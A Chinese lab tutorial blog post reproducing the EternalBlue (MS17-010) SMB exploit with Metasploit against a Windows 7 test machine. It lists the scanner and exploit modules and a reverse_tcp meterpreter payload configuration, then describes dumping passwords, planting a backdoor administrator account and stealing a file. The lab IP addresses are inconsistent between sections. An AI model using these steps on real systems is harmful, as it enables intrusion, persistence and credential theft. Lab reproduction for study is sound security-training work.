eternalblue永恒之蓝漏洞复现

ls-pankong ls-pankong     2023-04-30     732

关键词:

EternalBlue漏洞复现

1.    实训目的

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。学习漏洞原理掌握攻击方法。

2. 实训原理

  • 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
  • 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码

 

3. 实训环境

  1. Kali系统  版本:2.0   IP:192.168.0.145
  2. Win7系统           IP:192.168.0.130   开放端口:445
  3. MSF框架版本:4.14.17版本以上
  4. 安装更新metasploit 

4. 实训步骤

查看MSF框架版本

在终端输入msfconsole,进入界面如图1所示。

技术图片

 

 

 

 

 

 

图1

在进行实验时查看数据库连接和配置如图2所示。

 技术图片

 

 

 

图2

 

搜索ms17_010图3所示。

 

                          技术图片

 

 

 

图3

扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue

如图4所示

                                                                            技术图片

 

 

图4

 

加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost 192.168.122.130 (靶机的IP)

set lhost 192.168.122.145(发起攻击的主机IP)

set lport 443    

 

 

                                                                                    技术图片

 

 

 

 

图5

发起攻击,成功会反弹shell

输入run或者exploit,结果如图6所示。

                         技术图片

 

 

 

图6

 

获取系统管理密码信息如图7所示。

 

技术图片

 

 

 

 

图7

反弹shell, 种植后门创建一个用户,并查看如图8所示。

   

技术图片

 

 

 

 

图8

 

加入管理员用户并查看,如图9所示。

技术图片

 

 

 

 

图9

创建txt文件,并在kali里截取。如图10所示。

 

技术图片

 

 

 

 

 

技术图片

 

图10

远程登录如图13所示。

 

 

 

                       技术图片

 

 

 

图13

 

本次实验主要是利用永恒之蓝漏洞攻击一台主机,掌握永恒之蓝漏洞原理。

永恒之蓝漏洞原理及复现

一.介绍。1.什么是永恒之蓝。永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wann... 查看详情

ms17-010永恒之蓝病毒复现

...恒之蓝漏洞复现(ms17-010)1.1    漏洞描述:Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电... 查看详情

eternalblue永恒之蓝漏洞利用--洪水猛兽

EternalBlue永恒之蓝漏洞利用0x01漏洞介绍什么是永恒之蓝漏洞:恶意代码利用Windows系统的SMB漏洞可以获取系统最高权限。师傅们扫描开放445(文件及打印机共享)端口的Windows服务器,对该漏洞进行利用后无需用户... 查看详情

ms17-010(永恒之蓝)漏洞分析与复现(代码片段)

...tionalSecurityAgency,美国国家安全局)泄露的漏洞“EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和... 查看详情

关于nsa的eternalblue(永恒之蓝)ms17-010漏洞利用

    好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,... 查看详情

永恒之蓝(ms17-010)漏洞简介及复现

一、永恒之蓝简介与危害永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限... 查看详情

永恒之蓝漏洞利用复现

一、环境搭建:IP地址系统信息备注角色192.168.0.244win7旗舰版(未安装MS17-010补丁版本)需开启445端口及SMB协议靶机192.168.0.105win7旗舰版需安装python2.6.6&pywin32攻击机192.168.0.245kalilinux2.0生成reverseshell的dll文件辅助机二、攻击流程... 查看详情

永恒之蓝ms17-010漏洞复现

MS17_010永恒之蓝漏洞复现目录前言1.准备工作2.漏洞利用步骤前言永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络attack工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以... 查看详情

ms17-010(永恒之蓝)漏洞复现和分析(代码片段)

MS17-010(永恒之蓝)漏洞复现和分析一、漏洞简介1、永恒之蓝介绍:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利... 查看详情

细谈永恒之蓝,实现复现!!

永恒之蓝定义:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12... 查看详情

ms17010(永恒之蓝)漏洞复现(代码片段)

MS17010(永恒之蓝)漏洞利用与复现首先需要准备win7的环境做为靶机获取信息利用nmap扫描得到,靶机IPnmap-sP192.168.229.0/24得到:IP:192.168.229.169然后利用:nmap--script=vuln192.168.229.169得到靶机信息:发现可能利用的漏洞&... 查看详情

永恒之蓝ms17-010漏洞利用(代码片段)

前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情

永恒之蓝ms17-010漏洞利用(代码片段)

前言永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒... 查看详情

使用kali复现永恒之蓝(代码片段)

使用Kali复现永恒之蓝本次实验为离线靶机测试实验步骤确认测试环境:在开始测试之前,需要确认测试环境是否符合要求。我使用的是一台运行Kali的测试机和一台运行Windows764位的靶机。确保测试机和靶机之间可以进行网络通信... 查看详情

永恒之蓝,17-010漏洞复现,实现远程桌面连接,超详细步骤,小白必看

...找17-010 5、进入这个漏洞:use exploit/windows/smb/ms17_010_eternalblue 6、进入后先:showoptions(查看要设置的参数)7、设置参数  8、show targets(查看可攻击的系统)9、我前边说了,我的靶机是win7,这里... 查看详情

kali利用msf通过win7永恒之蓝漏洞获取权限(代码片段)

...写过博客记录自己的学习了,今天顺手也记录一下。Eternalblue通过TCP端 查看详情

反黑风暴·记一次遭遇ssdpddos和eternalblue(永恒之蓝)攻击经历

反黑风暴·记一次遭遇SSDPDDoS和EternalBlue(永恒之蓝)攻击经历前言故事一:SSDPDDoS故事二:EternalBlue(永恒之蓝)总结参考作者:高玉涵时间:2021.12.0715:45博客:blog.csdn.net/cg_i前言 就在昨天下... 查看详情

局域网永恒之蓝病毒发包的解决方案之二(代码片段)

1.使用shadowbroker的eternalblue还有doublepulsar实现注入到目标机器的进程,然后使用kali下的msf获取到有病毒机器的shell然后修改密码查看问题等.根据网上的教程来进行处理以及复现等教程地址:http://blog.csdn.net/claygrit/article/details/77284739ht... 查看详情